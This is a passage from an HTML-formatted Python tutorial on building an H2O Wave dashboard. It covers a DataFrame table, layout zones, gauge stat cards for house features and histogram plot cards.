&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Add the table&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;table&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;form_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;50%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; items &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [make_table(df)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Sadly, there is no seemingly simple way to display a &lt;code&gt;pandas.DataFrame&lt;/code&gt; with H2O Wave so we have to be a little cunning with how we feed our data frame into &lt;code&gt;ui.table()&lt;/code&gt;. If you look at the &lt;a href="https://wave.h2o.ai/docs/api/ui#table" rel="external"&gt;documentation&lt;/a&gt; for &lt;code&gt;ui.table()&lt;/code&gt; it expects arguments &lt;code&gt;columns&lt;/code&gt; and &lt;code&gt;rows&lt;/code&gt; with type &lt;code&gt;List[TableColumn]&lt;/code&gt; and &lt;code&gt;List[TableRow]&lt;/code&gt; respectively, so we cannot simply feed the columns and rows of our data frame to &lt;code&gt;columns&lt;/code&gt; and &lt;code&gt;rows&lt;/code&gt;. Instead, what we can do is use list comprehensions to define the columns and rows which is what we do in &lt;code&gt;make_table()&lt;/code&gt; above. Defining the columns is pretty straight forward, we use &lt;code&gt;ui.table_column()&lt;/code&gt; to define each column and pass in the column name from &lt;code&gt;df.columns.tolist()&lt;/code&gt;. Defining the rows is a little more complicated. We can use the same trick as we did for the columns by using &lt;code&gt;df.values.tolist()&lt;/code&gt; to extract the rows, however the arguments in &lt;code&gt;ui.table_row()&lt;/code&gt; expect strings, so we need to convert the values passed to &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;cells&lt;/code&gt;. For the list comprehension we can simply iterate over an array with the row indices and convert the name of each row to a string using &lt;code&gt;str()&lt;/code&gt; which we pass to &lt;code&gt;name&lt;/code&gt;. For the &lt;code&gt;cells&lt;/code&gt; we need to map the output from &lt;code&gt;df.values.tolist()[i]&lt;/code&gt; to a string and then set this as a list.&lt;/p&gt;
&lt;p&gt;Now that we&amp;rsquo;ve made our table with &lt;code&gt;make_table()&lt;/code&gt; we can make a function &lt;code&gt;show_table()&lt;/code&gt; to display it in our app. We can use a section card to give a title above the table with &lt;code&gt;ui.section_card()&lt;/code&gt; and add the table by passing it to the &lt;code&gt;item&lt;/code&gt; argument inside a form card. We specify where the card will go by using the &lt;code&gt;box&lt;/code&gt; argument. Here we are using &lt;code&gt;ui.box()&lt;/code&gt; to specify which zone our table is in with &lt;code&gt;'top'&lt;/code&gt; and use the &lt;code&gt;width&lt;/code&gt; argument to specify the desired space for the table. We need to then add these extra zones to &lt;code&gt;apply_layout()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;meta&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;meta_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;, theme&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;nord&amp;#39;&lt;/span&gt;, layouts&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breakpoint&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;xl&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;1600px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;content&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;COLUMN,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;##NEWLINE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;310px&amp;#39;&lt;/span&gt;, direction &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW), &lt;span style="color:#8b949e;font-style:italic"&gt;##NEWLINE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice that we specify zones within zones here for the main body of our app. We specify &lt;code&gt;'content'&lt;/code&gt; and use the &lt;code&gt;direction&lt;/code&gt; argument which is useful to define the layout direction for the app. We also use the &lt;code&gt;direction&lt;/code&gt; argument in our &lt;code&gt;top&lt;/code&gt; zone. This instructs our app to only fill up 50% of the &lt;code&gt;top&lt;/code&gt; zone. We also use the &lt;code&gt;size&lt;/code&gt; argument to specify the size of the zone, which for us is the height of the zone. Try changing this argument and you will see it&amp;rsquo;s effect. We&amp;rsquo;ll fill in the other 50% of the zone with some stats cards which we&amp;rsquo;ll walk through below.&lt;/p&gt;
&lt;p&gt;Finally, to get the table to display in our app we need to call the function inside &lt;code&gt;server&lt;/code&gt;().&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sever&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_table(q, df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now that we&amp;rsquo;ve updated &lt;code&gt;server()&lt;/code&gt;, save the code and your browser should update and look very similar to this image.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Wave app displayed in the browser showing addition of a table." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/adding_table.png" width="1850"&gt;&lt;/p&gt;
&lt;h2 id="adding-stats-cards"&gt;Adding stats cards&lt;/h2&gt;
&lt;p&gt;Next we&amp;rsquo;ll add stats cards to our app to fill the space next to our table. Stats cards can be used in a variety of ways to display simple statistics. We are going to use them to display some binary data in our dataset, such as &lt;code&gt;'hasYard'&lt;/code&gt;, by displaying the total number of attributes that are &lt;code&gt;1&lt;/code&gt; (i.e. for &lt;code&gt;hasYard&lt;/code&gt; the number of houses that have a yard).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_stats_card_data&lt;/span&gt;(q:Q, column):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; column&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value_counts()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value_counts&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sum()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; value_counts[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;], total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_stats_card&lt;/span&gt;(q:Q, column, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value_count, total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; make_stats_card_data(q, column)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; percentage &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value_count&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;stat&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;str(index)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tall_gauge_stat_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;11.75%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Number of houses with &amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; column&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;={{intl one}}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; aux_value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;={{intl perc style=&amp;#34;percent&amp;#34; minimum_fraction_digits=2 maximum_fraction_digits=2 }}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; progress &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; percentage,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dict(one &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; int(value_count), perc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; float(percentage)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot_color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;$blue&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_multiple_stats_cards&lt;/span&gt;(q:Q, df, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; index:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[column_name]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_stats_card(q, column, i)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To start we need to transform the data that is passed to our stats card using &lt;code&gt;make_stats_card_data()&lt;/code&gt; so it is in a suitable format. This counts the number of zeros and ones and sums the results to give the total. This is then used in &lt;code&gt;show_stats_card()&lt;/code&gt;. Here we use a &lt;code&gt;tall_gauge_stat_card()&lt;/code&gt; and using the same trick as before use &lt;code&gt;ui.box()&lt;/code&gt; to define how much space our card takes up. Now to pass values to &lt;code&gt;value&lt;/code&gt; and &lt;code&gt;aux_value&lt;/code&gt; we need to pass information to our &lt;code&gt;data&lt;/code&gt; augment. The simplest way to do this is by using a dictionary. We can then use the keys in our &lt;code&gt;value&lt;/code&gt; and &lt;code&gt;aux_value&lt;/code&gt; arguments. When looking at the &lt;a href="https://wave.h2o.ai/docs/api/ui#tall_gauge_stat_card" rel="external"&gt;documentation&lt;/a&gt; for a &lt;code&gt;tall_gauge_stat_card&lt;/code&gt; we can see that the arguments just mentioned expect strings as their input. The standard way to pass arguments to these are by using &lt;code&gt;={{}}&lt;/code&gt; notation and then define the type of the data. We then give the keys from our dictionary and any other commands, such as the style to display the value and the number of decimal points to display (the values in the middle of the stats cards example image below). The &lt;code&gt;progress&lt;/code&gt; argument is used in the circle around the data (the light blue colour in the example image below) and should be between zero and one. Finally, you can pass the colour of the circle using &lt;code&gt;plot_color&lt;/code&gt;, but your argument must be of the form &lt;code&gt;$&amp;lt;COLOUR&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Example images of a H2O Wave tall gauge stats card" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/stats_cards.png" width="875"&gt;&lt;/p&gt;
&lt;p&gt;Notice in &lt;code&gt;show_stats_card()&lt;/code&gt; how we set up our page. We give a base name, &lt;code&gt;'stats'&lt;/code&gt;, and then add an addition string which can be changed to allow the same piece of code to produce multiple stats cards. This is what we do in &lt;code&gt;show_multiple_stats_cards&lt;/code&gt;, we simply loop over different indices which related to the columns so we make multiple cards. If we didn&amp;rsquo;t do this and kept all cards labeled &lt;code&gt;'stats'&lt;/code&gt; only one stats card would appear in our app.&lt;/p&gt;
&lt;p&gt;Like the table we created above, the final step is to add &lt;code&gt;show_multiple_stats_cards()&lt;/code&gt; to &lt;code&gt;server()&lt;/code&gt; and pass in columns that we want to display as stats cards. Here we have passed in indices of binary columns.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sever&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_table(q, df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_multiple_stats_cards(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After updating &lt;code&gt;server()&lt;/code&gt; and saving your code you should see something very similar to this image.&lt;/p&gt;
&lt;p&gt;&lt;img alt="The Wave app displayed in the browser with the additional stats cards." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/adding_stats_cards.png" width="1849"&gt;&lt;/p&gt;
&lt;h2 id="adding-plots"&gt;Adding plots&lt;/h2&gt;
&lt;p&gt;The final items we will add to our app are some histogram plots. To add a histogram to our Wave app we first need to transform the data into bins and counts which we can then pass into a plot card, &lt;code&gt;ui.plot_card()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can transform our data pretty easily thanks to &lt;code&gt;numpy&lt;/code&gt;. We simply need to pass our data to the &lt;code&gt;numpy.histogram()&lt;/code&gt; function and reshape it so it is ready for the plot card. This is what we have done in our &lt;code&gt;made_histogram_data()&lt;/code&gt; function in the code below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_histogram_data&lt;/span&gt;(values):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; count, division &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;histogram(values)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; [(x, y) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; zip(division&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist(), count&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist())]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_histogram&lt;/span&gt;(q:Q, values, variable_name, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;feat&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;variable_name] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;bottom&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;25%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of &amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; variable_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#39;division&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;count&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; make_histogram_data(values),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot([ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;mark(type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;interval&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;=division&amp;#39;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;=count&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y_min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;variable_name, y_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Count&amp;#39;&lt;/span&gt;)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
